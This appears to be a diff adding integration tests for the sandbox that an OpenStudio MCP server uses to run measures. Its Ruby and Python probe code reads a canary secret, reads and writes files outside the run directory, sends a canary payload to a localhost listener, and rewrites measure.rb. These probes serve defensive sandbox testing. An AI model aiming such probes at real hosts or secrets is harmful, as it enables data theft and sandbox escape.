+    (off = full passthrough, by design — the Codex `danger-full-access` model).
+  - Each probe attempts an attack and reports via runner.registerInfo("PROBE ...").
+    The AUTHORITATIVE check is external ground truth (escape file on disk, bytes
+    the listener received, the uid value), not just the measure's self-report.
+
+Fix increment 1 has landed (clean-env floor + unconditional measure_dir check):
+  - test_measure_exec_unconfined_today (OSMCP_SANDBOX=off) still proves all five
+    holes — off is a true passthrough by design.
+  - test_clean_env_blocks_secret_leak (OSMCP_SANDBOX=posix) proves the env-secret
+    leak is closed and a normal run still succeeds (allowlist complete enough).
+  - test_measure_dir_traversal_blocked proves arbitrary out-of-root measure paths
+    are rejected (check is unconditional, not gated by OSMCP_SANDBOX).
+Fix increment 2 (UID drop + rlimits) and increment 3 (Landlock FS + seccomp
+net-deny) have landed:
+  - test_posix_drops_root_and_applies_rlimits — per-tenant non-root uid, NPROC
+    rlimit, DAC blocks a root-owned write (OSMCP_SANDBOX=posix).
+  - test_full_tier_blocks_read_escape_and_network — Landlock blocks reading a
+    world-readable file outside the run dir, blocks writing outside it, and
+    seccomp blocks outbound IP networking (OSMCP_SANDBOX=auto), while the run
+    still succeeds.
+With the full tier, all five holes are closed; off remains a true passthrough.
+
+Safety notes:
+  - Decoys live under RUN_ROOT / a tmpdir on the disposable runs volume and are
+    deleted in finally blocks.
+  - The network probe targets a localhost listener owned by this test process,
+    inside the same container — no traffic leaves the machine.
+"""
+import asyncio
+import os
+import re
+import shutil
+import socket
+import subprocess
+import sys
+import tempfile
+import textwrap
+import threading
+import uuid
+from pathlib import Path
+
+import pytest
+from conftest import (
+    EPW_PATH,
+    http_server,
+    http_session,
+    integration_enabled,
+    setup_example,
+    unwrap,
+)
+
+pytestmark = pytest.mark.integration
+
+RUN_ROOT = Path(
+    os.environ.get("OPENSTUDIO_MCP_RUN_ROOT", os.environ.get("OSMCP_RUN_ROOT", "/runs")),
+)
+_FIXTURE_MEASURE = Path(__file__).parent / "assets" / "measures" / "set_building_name"
+
+# Each probe attempts one attack and registers a "PROBE <name>=<value>" line.
+# victim_path / escape_path / net_target are passed as measure arguments, so the
+# same measure body exercises all five holes in a single `openstudio run`.
+_RB_PROBE_BODY = """
+require 'socket'
+runner.registerInfo("PROBE uid=#{Process.uid}")
+runner.registerInfo("PROBE nproc=#{Process.getrlimit(:NPROC)[0]}")
+runner.registerInfo("PROBE env=#{ENV['OSMCP_CANARY_SECRET'] || '<absent>'}")
+begin
+  runner.registerInfo("PROBE read=#{File.read(victim_path).strip}")
+rescue => e
+  runner.registerInfo("PROBE read_err=#{e.class}")
+end
+begin
+  File.write(escape_path, "ESCAPED")
+  runner.registerInfo("PROBE wrote=#{escape_path}")
+rescue => e
+  runner.registerInfo("PROBE write_err=#{e.class}")
+end
+begin
+  host, port = net_target.split(":")
+  s = TCPSocket.new(host, port.to_i)
+  s.write("CANARY_EXFIL")
+  s.close
+  runner.registerInfo("PROBE net=sent")
+rescue => e
+  runner.registerInfo("PROBE net_err=#{e.class}")
+end
+"""
+
+_PY_PROBE_BODY = """
+import os
+import socket
+import resource
+runner.registerInfo("PROBE uid=%d" % os.getuid())
+runner.registerInfo("PROBE nproc=%d" % resource.getrlimit(resource.RLIMIT_NPROC)[0])
+runner.registerInfo("PROBE env=%s" % os.environ.get("OSMCP_CANARY_SECRET", "<absent>"))
+try:
+    with open(victim_path) as f:
+        runner.registerInfo("PROBE read=%s" % f.read().strip())
+except Exception as e:
+    runner.registerInfo("PROBE read_err=%s" % type(e).__name__)
+try:
+    with open(escape_path, "w") as f:
+        f.write("ESCAPED")
+    runner.registerInfo("PROBE wrote=%s" % escape_path)
+except Exception as e:
+    runner.registerInfo("PROBE write_err=%s" % type(e).__name__)
+try:
+    host, port = net_target.split(":")
+    s = socket.create_connection((host, int(port)), timeout=5)
+    s.sendall(b"CANARY_EXFIL")
+    s.close()
+    runner.registerInfo("PROBE net=sent")
+except Exception as e:
+    runner.registerInfo("PROBE net_err=%s" % type(e).__name__)
+"""
+
+_PROBE_ARGS = [
+    {"name": "victim_path", "type": "String", "required": True, "default_value": ""},
+    {"name": "escape_path", "type": "String", "required": True, "default_value": ""},
+    {"name": "net_target", "type": "String", "required": True, "default_value": ""},
+]
+
+
+def _unique(prefix: str = "pytest_sandbox") -> str:
+    return f"{prefix}_{uuid.uuid4().hex[:10]}"
+
+
+def _probe_body(language: str) -> str:
+    """Indent the probe body to the base indent create_measure injects at."""
+    if language == "Ruby":
+        return textwrap.indent(textwrap.dedent(_RB_PROBE_BODY).strip("\n"), "    ")
+    return textwrap.indent(textwrap.dedent(_PY_PROBE_BODY).strip("\n"), "        ")
+
+
+class _CanaryListener:
+    """Localhost TCP listener that records the first payload it receives.
+
+    Owned by the test process, bound to 127.0.0.1 inside the container — the
+    measure subprocess connects to it; nothing leaves the machine.
+    """
+
+    def __init__(self):
+        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+        self.sock.bind(("127.0.0.1", 0))
+        self.sock.listen(1)
+        self.sock.settimeout(30)
+        self.port = self.sock.getsockname()[1]
+        self.received = b""
+        self._thread = threading.Thread(target=self._serve, daemon=True)
+
+    def start(self):
+        self._thread.start()
+
+    def _serve(self):
+        try:
+            conn, _ = self.sock.accept()
+            with conn:
+                conn.settimeout(5)
+                self.received = conn.recv(1024)
+        except OSError:
+            pass
+        finally:
+            self.sock.close()
+
+    def close(self):
+        try:
+            self.sock.close()
+        except OSError:
+            pass
+
+
+@pytest.fixture(scope="module")
+def sandbox_server():
+    """One HTTP server for the module, with a fake canary secret in its env.
+
+    OSMCP_SANDBOX=off pins the current unconfined passthrough so these stay valid
+    once the sandbox exists. The canary is a fake value — never a real credential.
+    """
+    if not integration_enabled():
+        pytest.skip("integration disabled")
+    canary = f"do-not-leak-{uuid.uuid4().hex[:8]}"
+    with http_server({
+        "MCP_AUTH": "none",
+        "OSMCP_SANDBOX": "off",
+        "OSMCP_CANARY_SECRET": canary,
+    }) as (url, _proc):
+        yield url, canary
+
+
+@pytest.fixture(scope="module")
+def confined_server():
+    """An HTTP server with the POSIX floor on (OSMCP_SANDBOX=posix)."""
+    if not integration_enabled():
+        pytest.skip("integration disabled")
+    canary = f"do-not-leak-{uuid.uuid4().hex[:8]}"
+    with http_server({
+        "MCP_AUTH": "none",
+        "OSMCP_SANDBOX": "posix",
+        "OSMCP_CANARY_SECRET": canary,
+    }) as (url, _proc):
+        yield url, canary
+
+
+@pytest.fixture(scope="module")
+def full_server():
+    """An HTTP server with the full tier (OSMCP_SANDBOX=auto: posix + Landlock + seccomp)."""
+    if not integration_enabled():
+        pytest.skip("integration disabled")
+    canary = f"do-not-leak-{uuid.uuid4().hex[:8]}"
+    with http_server({
+        "MCP_AUTH": "none",
+        "OSMCP_SANDBOX": "auto",
+        "OSMCP_CANARY_SECRET": canary,
+    }) as (url, _proc):
+        yield url, canary
+
+
+@pytest.fixture(scope="module")
+def net_allow_server():
+    """Full tier but with the network deny opted out (OSMCP_SANDBOX_NET=allow)."""
+    if not integration_enabled():
+        pytest.skip("integration disabled")
+    with http_server({
+        "MCP_AUTH": "none",
+        "OSMCP_SANDBOX": "auto",
+        "OSMCP_SANDBOX_NET": "allow",
+    }) as (url, _proc):
+        yield url
+
+
+async def _create_probe_measure(session, language: str) -> str:
+    res = unwrap(await session.call_tool("create_measure", {
+        "name": _unique("sandbox_probe_" + ("rb" if language == "Ruby" else "py")),
+        "description": "Sandbox vulnerability probe (test fixture).",
+        "run_body": _probe_body(language),
+        "language": language,
+        "arguments": _PROBE_ARGS,
+    }))
+    assert res.get("ok") is True, f"create_measure failed: {res}"
+    return res["measure_dir"]
+
+
+@pytest.mark.parametrize("language", ["Ruby", "Python"])
+def test_measure_exec_unconfined_today(language, sandbox_server):
+    # Validates: an applied measure today runs as root, sees the server's secret
+    # env, reads outside its run dir, writes outside its run dir, and opens the
+    # network — the five holes the sandbox must close. Proven safely via canaries.
+    url, canary = sandbox_server
+    tag = uuid.uuid4().hex[:8]
+    victim_secret = f"VICTIM_SECRET_{tag}"
+    victim_dir = RUN_ROOT / f"_decoy_victim_{tag}"
+    victim_dir.mkdir(parents=True, exist_ok=True)
+    victim_file = victim_dir / "secret.txt"
+    victim_file.write_text(victim_secret, encoding="utf-8")
+    escape_file = RUN_ROOT / f"_decoy_escape_{tag}.txt"
+    listener = _CanaryListener()
+    listener.start()
+
+    try:
+        async def _run():
+            async with http_session(url) as s:
+                # --- Arrange ---
+                await setup_example(s, _unique())
+                measure_dir = await _create_probe_measure(s, language)
+
+                # --- Act ---
+                res = unwrap(await s.call_tool("apply_measure", {
+                    "measure_dir": measure_dir,
+                    "arguments": {
+                        "victim_path": str(victim_file),
+                        "escape_path": str(escape_file),
+                        "net_target": f"127.0.0.1:{listener.port}",
+                    },
+                }))
+                assert res.get("ok") is True, f"apply_measure failed: {res}"
+                return "\n".join(res.get("runner_messages", {}).get("info", []))
+
+        info = asyncio.run(_run())
+
+        # --- Assert: each hole is real ---
+        # 1. Runs as root — no privilege drop.
+        assert "PROBE uid=0" in info, \
+            f"measure should run as root (uid 0) today; info=\n{info}"
+        # 2. Server's secret env leaks into the measure (os.environ.copy()).
+        assert f"PROBE env={canary}" in info, \
+            f"canary secret should leak into measure env today; info=\n{info}"
+        # 3. Reads a file outside its run dir (another run's area).
+        assert f"PROBE read={victim_secret}" in info, \
+            f"measure should read the decoy victim file today; info=\n{info}"
+        # 4. Writes a file outside its run dir — ground truth: file on disk.
+        assert "PROBE wrote=" in info, f"measure should report a write; info=\n{info}"
+        assert escape_file.is_file() and escape_file.read_text() == "ESCAPED", \
+            "measure should write outside its run dir today (escape file on disk)"
+        # 5. Opens the network — ground truth: listener received the payload.
+        assert "PROBE net=sent" in info, f"measure should report net send; info=\n{info}"
+        listener._thread.join(timeout=5)
+        assert listener.received == b"CANARY_EXFIL", \
+            f"localhost listener should receive exfil today; got {listener.received!r}"
+    finally:
+        listener.close()
+        shutil.rmtree(victim_dir, ignore_errors=True)
+        escape_file.unlink(missing_ok=True)
+
+
+def test_measure_dir_traversal_blocked(sandbox_server):
+    # Regression: apply_measure must reject a measure_dir outside all allowed
+    # roots (own run area / shared read roots), closing the traversal hole where
+    # any /tmp path holding a measure.rb was copied and executed. The check is
+    # unconditional (not gated by OSMCP_SANDBOX), so it holds even with sandbox off.
+    url, _canary = sandbox_server
+    outside_dir = Path(tempfile.mkdtemp(prefix="osmcp_decoy_measure_"))
+    decoy_measure = outside_dir / "set_building_name"
+    shutil.copytree(_FIXTURE_MEASURE, decoy_measure)
+
+    try:
+        async def _run():
+            async with http_session(url) as s:
+                # --- Arrange ---
+                await setup_example(s, _unique())
+                # --- Act ---
+                return unwrap(await s.call_tool("apply_measure", {
+                    "measure_dir": str(decoy_measure),
+                    "arguments": {"building_name": "Traversal Test"},
+                }))
+
+        res = asyncio.run(_run())
+
+        # --- Assert: out-of-root measure path is refused before any execution ---
+        assert res.get("ok") is False, \
+            f"apply_measure must reject a measure_dir outside allowed roots; got {res}"
+        assert "not allowed" in str(res.get("error", "")).lower(), \
+            f"error should explain the path is not allowed; got {res.get('error')}"
+    finally:
+        shutil.rmtree(outside_dir, ignore_errors=True)
+
+
+@pytest.mark.parametrize("language", ["Ruby", "Python"])
+def test_clean_env_blocks_secret_leak(language, confined_server):
+    # Validates: OSMCP_SANDBOX=posix strips the server's secret env via the
+    # allowlist, so an applied measure no longer sees host secrets — AND a normal
+    # measure run still succeeds, proving the allowlist is complete enough.
+    url, canary = confined_server
+
+    async def _run():
+        async with http_session(url) as s:
+            # --- Arrange ---
+            await setup_example(s, _unique())
+            measure_dir = await _create_probe_measure(s, language)
+            # --- Act ---
+            res = unwrap(await s.call_tool("apply_measure", {
+                "measure_dir": measure_dir,
+                "arguments": {"victim_path": "", "escape_path": "", "net_target": ""},
+            }))
+            assert res.get("ok") is True, f"apply_measure under posix failed: {res}"
+            return "\n".join(res.get("runner_messages", {}).get("info", []))
+
+    info = asyncio.run(_run())
+
+    # --- Assert: canary secret is gone, the run still produced output ---
+    assert "PROBE env=<absent>" in info, \
+        f"clean-env should hide the canary under posix; info=\n{info}"
+    assert canary not in info, \
+        f"canary secret must not appear anywhere under posix; info=\n{info}"
+
+
+@pytest.mark.parametrize("language", ["Ruby", "Python"])
+def test_posix_drops_root_and_applies_rlimits(language, confined_server):
+    # Validates: OSMCP_SANDBOX=posix runs the measure as the unprivileged sandbox
+    # uid (1001), applies the NPROC rlimit, and DAC then denies a write to a
+    # root-owned location outside the run dir (/opt — in-image, not a bind mount,
+    # so ownership is enforced regardless of host). Read/network are NOT yet closed
+    # at this tier (Landlock/seccomp follow) — not asserted here.
+    url, _canary = confined_server
+    tag = uuid.uuid4().hex[:8]
+    escape_file = Path(f"/opt/_sbx_escape_{tag}.txt")  # root-owned, in-image
+
+    async def _run():
+        async with http_session(url) as s:
+            # --- Arrange ---
+            await setup_example(s, _unique())
+            measure_dir = await _create_probe_measure(s, language)
+            # --- Act ---
+            res = unwrap(await s.call_tool("apply_measure", {
+                "measure_dir": measure_dir,
+                "arguments": {
+                    "victim_path": "", "escape_path": str(escape_file), "net_target": "",
+                },
+            }))
+            assert res.get("ok") is True, f"apply_measure under posix failed: {res}"
+            return "\n".join(res.get("runner_messages", {}).get("info", []))
+
+    info = asyncio.run(_run())
+
+    # --- Assert: privilege dropped to a per-tenant uid, rlimit applied, DAC blocks
+    # the escape write. The HTTP fixture is session-keyed, so the measure drops to a
+    # derived per-tenant uid (M1/M2), not the shared base 1001. ---
+    m = re.search(r"PROBE uid=(\d+)", info)
+    assert m, f"probe must report uid; info=\n{info}"
+    uid = int(m.group(1))
+    assert uid != 0, "measure must not run as root under posix"
+    assert 2000 <= uid < 62000, \
+        f"HTTP tenant must drop to a per-tenant sandbox uid (2000..61999), got {uid}; info=\n{info}"
+    assert "PROBE nproc=1024" in info, f"NPROC rlimit (1024) should be applied; info=\n{info}"
+    assert "PROBE write_err=" in info, \
+        f"write to root-owned /opt should be denied under posix; info=\n{info}"
+    assert not escape_file.exists(), "DAC must block writing a root-owned out-of-run-dir path"
+
+
+@pytest.mark.parametrize("language", ["Ruby", "Python"])
+def test_full_tier_blocks_read_escape_and_network(language, full_server):
+    # Validates: OSMCP_SANDBOX=auto (Landlock FS + seccomp net-deny on top of the
+    # POSIX floor) blocks reading a world-readable file outside the run dir
+    # (root-owned /opt, not in the read-only allowlist — so DAC alone would NOT
+    # block it; Landlock does), blocks writing outside the run dir, and blocks
+    # outbound IP networking — while the measure run itself still succeeds.
+    url, _canary = full_server
+    tag = uuid.uuid4().hex[:8]
+    victim_secret = f"VICTIM_SECRET_{tag}"
+    victim_file = Path(f"/opt/_sbx_victim_{tag}.txt")   # root-owned, in-image, not allowlisted
+    victim_file.write_text(victim_secret, encoding="utf-8")
+    escape_file = Path(f"/opt/_sbx_escape_{tag}.txt")
+    listener = _CanaryListener()
+    listener.start()
+
+    try:
+        async def _run():
+            async with http_session(url) as s:
+                # --- Arrange ---
+                await setup_example(s, _unique())
+                measure_dir = await _create_probe_measure(s, language)
+                # --- Act ---
+                res = unwrap(await s.call_tool("apply_measure", {
+                    "measure_dir": measure_dir,
+                    "arguments": {
+                        "victim_path": str(victim_file),
+                        "escape_path": str(escape_file),
+                        "net_target": f"127.0.0.1:{listener.port}",
+                    },
+                }))
+                assert res.get("ok") is True, f"apply_measure under full tier failed: {res}"
+                return "\n".join(res.get("runner_messages", {}).get("info", []))
+
+        info = asyncio.run(_run())
+
+        # --- Assert: read escape, write escape, and network all denied ---
+        assert "PROBE read_err=" in info, f"read outside run dir should be denied; info=\n{info}"
+        assert victim_secret not in info, "victim secret must not leak under the full tier"
+        assert "PROBE write_err=" in info, f"write outside run dir should be denied; info=\n{info}"
+        assert not escape_file.exists(), "Landlock must block the out-of-run-dir write"
+        assert "PROBE net_err=" in info, f"outbound network should be denied; info=\n{info}"
+        listener._thread.join(timeout=3)
+        assert listener.received == b"", f"seccomp must block exfil; got {listener.received!r}"
+    finally:
+        listener.close()
+        victim_file.unlink(missing_ok=True)
+        escape_file.unlink(missing_ok=True)
+
+
+def test_landlock_confines_without_root():
+    # Validates: the unprivileged confinement layer (Landlock) applies even when
+    # the shim runs as a NON-root uid — so a local non-root server still confines
+    # measure filesystem access; the uid-drop is simply skipped (no hard fail).
+    # This is what protects a local user, not just the root Docker server.
+    workdir = tempfile.mkdtemp()
+    cmd = [
+        sys.executable, "-m", "mcp_server._sandbox_exec",
+        "--uid", "1001", "--gid", "1001",
+        "--landlock-ro", "/usr", "--landlock-ro", "/lib", "--landlock-ro", "/lib64",
+        "--landlock-rw", workdir,
+        "--", "cat", "/etc/hostname",  # /etc not granted -> must be denied
+    ]
+    try:
+        # Run the shim AS uid 1001 (non-root) to exercise the no-root path.
+        proc = subprocess.run(  # noqa: S603 - fixed argv, no shell
+            cmd, capture_output=True, text=True, cwd="/repo",
+            user=1001, group=1001, check=False,
+        )
+        out = (proc.stdout + proc.stderr).lower()
+        assert proc.returncode != 0, \
+            f"Landlock must block /etc read even without root; rc=0 out={out}"
+        assert "denied" in out, f"expected a permission-denied error; out={out}"
+    finally:
+        shutil.rmtree(workdir, ignore_errors=True)
+
+
+def test_local_host_files_protected(sandbox_server, full_server):
+    # Validates THE LOCAL ISSUE (dual-run, vuln -> fixed): the server bind-mounts
+    # the user's real host directories (here /repo). Unconfined, a measure an LLM
+    # authored writes straight into the user's checked-out repo on their machine;
+    # the sandbox blocks it. Benign — one canary file at the repo root, asserted
+    # PRESENT under off (the vulnerability) and ABSENT under auto (the fix),
+    # cleaned up either way. /repo is read-only in the sandbox allowlist, so the
+    # write is denied without breaking measures that legitimately read the repo.
+    tag = uuid.uuid4().hex[:8]
+    host_file = Path(f"/repo/_sandbox_local_canary_{tag}.txt")  # /repo = bind-mounted host source
+
+    async def _attempt_write(url):
+        async with http_session(url) as s:
+            await setup_example(s, _unique())
+            measure_dir = await _create_probe_measure(s, "Ruby")
+            res = unwrap(await s.call_tool("apply_measure", {
+                "measure_dir": measure_dir,
+                "arguments": {"victim_path": "", "escape_path": str(host_file), "net_target": ""},
+            }))
+            assert res.get("ok") is True, f"apply_measure failed: {res}"
+            return "\n".join(res.get("runner_messages", {}).get("info", []))
+
+    try:
+        # --- Vulnerability: unconfined (off) writes into the user's host repo ---
+        off_info = asyncio.run(_attempt_write(sandbox_server[0]))
+        assert "PROBE wrote=" in off_info, f"off: expected a successful write; {off_info}"
+        assert host_file.is_file(), \
+            "VULN: an unconfined measure wrote into the user's bind-mounted host dir (/repo)"
+        host_file.unlink(missing_ok=True)
+
+        # --- Fixed: confined (auto) denies the write ---
+        auto_info = asyncio.run(_attempt_write(full_server[0]))
+        assert "PROBE write_err=" in auto_info, f"auto: expected the write to be denied; {auto_info}"
+        assert not host_file.is_file(), \
+            "FIXED: the sandbox (Landlock, /repo read-only) blocks writing to the user's host dir"
+    finally:
+        host_file.unlink(missing_ok=True)
+
+
+def test_sandbox_net_allow_permits_network(net_allow_server):
+    # Validates: OSMCP_SANDBOX_NET=allow leaves outbound networking open under the
+    # full tier (the knob is actually wired into wrap_cmd; default deny is tested
+    # by test_full_tier_blocks_read_escape_and_network).
+    listener = _CanaryListener()
+    listener.start()
+    try:
+        async def _run():
+            async with http_session(net_allow_server) as s:
+                await setup_example(s, _unique())
+                measure_dir = await _create_probe_measure(s, "Ruby")
+                res = unwrap(await s.call_tool("apply_measure", {
+                    "measure_dir": measure_dir,
+                    "arguments": {
+                        "victim_path": "", "escape_path": "",
+                        "net_target": f"127.0.0.1:{listener.port}",
+                    },
+                }))
+                assert res.get("ok") is True, f"apply_measure failed: {res}"
+                return "\n".join(res.get("runner_messages", {}).get("info", []))
+
+        info = asyncio.run(_run())
+        assert "PROBE net=sent" in info, f"net should be allowed; info=\n{info}"
+        listener._thread.join(timeout=5)
+        assert listener.received == b"CANARY_EXFIL", \
+            f"OSMCP_SANDBOX_NET=allow should permit the connection; got {listener.received!r}"
+    finally:
+        listener.close()
+
+
+def _trivial_body(language: str) -> str:
+    indent = "    " if language == "Ruby" else "        "
+    return f'{indent}runner.registerInfo("measure ok")'
+
+
+async def _create_trivial_measure(session, language: str) -> str:
+    res = unwrap(await session.call_tool("create_measure", {
+        "name": _unique("tm_" + ("rb" if language == "Ruby" else "py")),
+        "description": "Trivial measure for test_measure confinement check.",
+        "run_body": _trivial_body(language),
+        "language": language,
+        "arguments": [],
+    }))
+    assert res.get("ok") is True, f"create_measure failed: {res}"
+    return res["measure_dir"]
+
+
+_EVIL_TEST = (
+    "import socket\n"
+    "def test_zzz_exfil():\n"
+    "    try:\n"
+    "        s = socket.create_connection(('127.0.0.1', {port}), timeout=5)\n"
+    "        s.sendall(b'CANARY_EXFIL')\n"
+    "        s.close()\n"
+    "    except Exception:\n"
+    "        pass\n"
+)
+
+
+def test_measure_test_code_confined(sandbox_server, full_server):
+    # Validates THE COPILOT FINDING fix (dual-run): test_measure now runs untrusted
+    # test code under the sandbox. Inject a test that exfils to a localhost
+    # listener; under off it connects (vuln — test code was unconfined), under auto
+    # seccomp blocks it (fixed). Asserts on the listener (ground truth). The off
+    # leg is the falsifiability control: it proves the evil test actually runs.
+    async def _run_test_measure(url, port):
+        async with http_session(url) as s:
+            measure_dir = await _create_trivial_measure(s, "Python")
+            evil = Path(measure_dir) / "tests" / "test_zzz_evil.py"
+            evil.write_text(_EVIL_TEST.format(port=port), encoding="utf-8")
+            await s.call_tool("test_measure", {"measure_dir": measure_dir})
+
+    # --- Vulnerability: off lets the (untrusted) test code reach the network ---
+    off_listener = _CanaryListener()
+    off_listener.start()
+    try:
+        asyncio.run(_run_test_measure(sandbox_server[0], off_listener.port))
+        off_listener._thread.join(timeout=5)
+        assert off_listener.received == b"CANARY_EXFIL", \
+            "VULN: test_measure ran test code that reached the network under off"
+    finally:
+        off_listener.close()
+
+    # --- Fixed: auto confines test_measure (seccomp blocks the exfil) ---
+    auto_listener = _CanaryListener()
+    auto_listener.start()
+    try:
+        asyncio.run(_run_test_measure(full_server[0], auto_listener.port))
+        auto_listener._thread.join(timeout=5)
+        assert auto_listener.received == b"", \
+            f"FIXED: test_measure code must be net-confined under auto; got {auto_listener.received!r}"
+    finally:
+        auto_listener.close()
+
+
+def test_measure_xml_refresh_does_not_execute_rewritten_measure_unconfined(full_server):
+    # Regression: sandboxed test code could rewrite measure.rb, then test_measure
+    # ran `openstudio measure -u` unsandboxed as root and evaluated the rewritten
+    # file. A disposable /repo canary proves no post-test evaluation escapes.
+    url, _ = full_server
+    canary = Path(f"/repo/_sandbox_xml_refresh_{uuid.uuid4().hex[:10]}.txt")
+
+    async def _run():
+        async with http_session(url) as s:
+            await setup_example(s, _unique())
+            created = unwrap(await s.call_tool("create_measure", {
+                "name": _unique("xml_refresh_probe"),
+                "description": "Benign post-test XML refresh confinement probe.",
+                "run_body": "    runner.registerInfo('normal measure body')",
+                "language": "Ruby",
+                "arguments": [],
+            }))
+            assert created["ok"] is True, f"create_measure failed: {created}"
+
+            measure_dir = Path(created["measure_dir"])
+            test_files = sorted((measure_dir / "tests").glob("*_test.rb"))
+            assert len(test_files) == 1, (
+                f"generated Ruby measure should have exactly one test file, got {test_files}"
+            )
+            test_files[0].write_text(
+                textwrap.dedent(
+                    f"""
+                    require 'openstudio'
+                    require 'minitest/autorun'
+                    require_relative '../measure'
+
+                    class XmlRefreshRewriteTest < Minitest::Test
+                      def test_rewrite_measure_after_load
+                        measure_path = File.expand_path('../measure.rb', __dir__)
+                        original = File.read(measure_path)
+                        payload = "File.write('{canary}', 'UNSANDBOXED_XML_REFRESH')\\n"
+                        File.write(measure_path, payload + original)
+                        assert_equal(false, File.exist?('{canary}'))
+                      end
+                    end
+                    """,
+                ).lstrip(),
+                encoding="utf-8",
+            )
+
+            return unwrap(await s.call_tool("test_measure", {
+                "measure_dir": str(measure_dir),
+            }))
+
+    try:
+        result = asyncio.run(_run())
+        assert result["ok"] is True, f"sandboxed measure test should pass: {result}"
+        assert not canary.exists(), (
+            "post-test `openstudio measure -u` evaluated rewritten measure.rb "
+            "outside the sandbox and created the host-mounted canary"
+        )
+    finally:
+        canary.unlink(missing_ok=True)
+
+
+# ---------------------------------------------------------------------------
+# Codex review reproductions (confirm-now): each PASSES today by demonstrating
+# the open hole, run under the FULL tier (OSMCP_SANDBOX=auto) so it proves the
+# sandbox does NOT yet stop it. Tagged with the Codex finding id + how to INVERT
+# the assertion once the fix lands. All use canaries/decoys only.
+# Not yet reproduced here (need heavier setup): C1 reporting-measure test path
+# (needs a completed sim/SQL), C2 `openstudio measure -u` Ruby injection,
+# H1 seccomp arch fail-open (needs an i386/x32 binary), H2 fail-open on a kernel
+# without Landlock.
+# ---------------------------------------------------------------------------
+
+def test_c3_escaping_symlink_rejected(full_server):
+    # Codex C3 (FIXED): a measure dir containing a symlink that escapes the measure
+    # root is rejected before any copy — no host-file content is inlined into the
+    # readable run dir.
+    url, _ = full_server
+    tag = uuid.uuid4().hex[:8]
+    secret_file = Path(f"/opt/_sbx_c3_{tag}.txt")  # outside the measure dir
+    secret_file.write_text(f"C3_SECRET_{tag}", encoding="utf-8")
+    try:
+        async def _run():
+            async with http_session(url) as s:
+                await setup_example(s, _unique())
+                mdir = Path(await _create_trivial_measure(s, "Ruby"))
+                (mdir / "evil_link.txt").symlink_to(secret_file)  # escaping symlink
+                return unwrap(await s.call_tool("apply_measure", {"measure_dir": str(mdir)}))
+
+        res = asyncio.run(_run())
+        assert res.get("ok") is False and "symlink" in str(res.get("error", "")).lower(), \
+            f"C3: an escaping symlink in the measure dir must be rejected; got {res}"
+    finally:
+        secret_file.unlink(missing_ok=True)
+
+
+def test_c4_run_simulation_rejects_out_of_root_osm(full_server):
+    # Codex C4 (FIXED): run_simulation rejects an OSM outside all allowed roots
+    # (no staging arbitrary host files into the run dir).
+    url, _ = full_server
+    tag = uuid.uuid4().hex[:8]
+    outside_osm = Path(f"/opt/_sbx_c4_{tag}.osm")  # outside every allowed root
+    try:
+        async def _run():
+            async with http_session(url) as s:
+                cr = unwrap(await s.call_tool("create_example_osm", {"name": _unique()}))
+                assert cr["ok"] is True, cr
+                shutil.copy2(cr["osm_path"], outside_osm)  # a valid OSM at a host path
+                res = unwrap(await s.call_tool("run_simulation", {
+                    "osm_path": str(outside_osm), "epw_path": EPW_PATH}))
+                if res.get("ok") and res.get("run_id"):
+                    await s.call_tool("cancel_run", {"run_id": res["run_id"]})
+                return res
+
+        res = asyncio.run(_run())
+        assert res.get("ok") is False and "not allowed" in str(res.get("error", "")).lower(), \
+            f"C4: out-of-root OSM must be rejected; got {res}"
+    finally:
+        outside_osm.unlink(missing_ok=True)
+
+
+def test_c5_test_measure_rejects_out_of_root_dir(full_server):
+    # Codex C5 (FIXED): test_measure rejects a measure_dir outside all allowed
+    # roots (before it would chown / Landlock-grant an arbitrary path).
+    url, _ = full_server
+    outside = Path(tempfile.mkdtemp(prefix="osmcp_c5_"))
+    decoy = outside / "set_building_name"
+    shutil.copytree(_FIXTURE_MEASURE, decoy)
+    try:
+        async def _run():
+            async with http_session(url) as s:
+                await setup_example(s, _unique())
+                return unwrap(await s.call_tool("test_measure", {"measure_dir": str(decoy)}))
+
+        res = asyncio.run(_run())
+        assert res.get("ok") is False and "not allowed" in str(res.get("error", "")).lower(), \
+            f"C5: out-of-root measure_dir must be rejected; got {res}"
+    finally:
+        shutil.rmtree(outside, ignore_errors=True)
+
+
+@pytest.fixture(scope="module")
+def uid0_server():
+    """Full tier but with a misconfigured sandbox uid of 0 (OSMCP_SANDBOX_UID=0)."""
+    if not integration_enabled():
+        pytest.skip("integration disabled")
+    with http_server({
+        "MCP_AUTH": "none", "OSMCP_SANDBOX": "auto",
+        "OSMCP_SANDBOX_UID": "0", "OSMCP_SANDBOX_GID": "0",
+    }) as (url, _proc):
+        yield url
+
+
+def test_h5_sandbox_uid_zero_clamped(uid0_server):
+    # Codex H5 (FIXED): OSMCP_SANDBOX_UID=0 is rejected/clamped to the safe default,
+    # so confined code never runs as root even with the bad override.
+    async def _run():
+        async with http_session(uid0_server) as s:
+            await setup_example(s, _unique())
+            measure_dir = await _create_probe_measure(s, "Ruby")
+            res = unwrap(await s.call_tool("apply_measure", {
+                "measure_dir": measure_dir,
+                "arguments": {"victim_path": "", "escape_path": "", "net_target": ""},
+            }))
+            assert res.get("ok") is True, f"apply_measure failed: {res}"
+            return "\n".join(res.get("runner_messages", {}).get("info", []))
+
+    info = asyncio.run(_run())
+    # OSMCP_SANDBOX_UID=0 must never yield a root-running measure. The base-uid
+    # clamp is unit-tested (test_sandbox_uid_zero_clamped); this HTTP fixture is
+    # session-keyed, so the measure drops to a per-tenant derived uid (also never
+    # root) regardless of the bad base override.
+    m = re.search(r"PROBE uid=(\d+)", info)
+    assert m, f"H5: probe must report uid; info=\n{info}"
+    uid = int(m.group(1))
+    assert uid != 0, f"H5: measure must NOT run as root with OSMCP_SANDBOX_UID=0; info=\n{info}"
+    assert 2000 <= uid < 62000, \
+        f"H5: confined code must run as a non-root per-tenant uid, got {uid}; info=\n{info}"
+
+
+def test_unknown_sandbox_mode_fails_closed():
+    # Regression: a typo'd OSMCP_SANDBOX (e.g. 'atuo') left enabled()=True but
+    # _full()=False, silently downgrading the default Landlock+seccomp tier to
+    # posix-only. An unknown value must normalize to 'auto' (fail-closed).
+    from mcp_server import config
+    assert config._normalize_sandbox_mode("atuo") == "auto"
+    assert config._normalize_sandbox_mode("landlok") == "auto"
+    assert config._normalize_sandbox_mode("AUTO") == "auto"
+    assert config._normalize_sandbox_mode(" posix ") == "posix"
+    assert config._normalize_sandbox_mode("off") == "off"
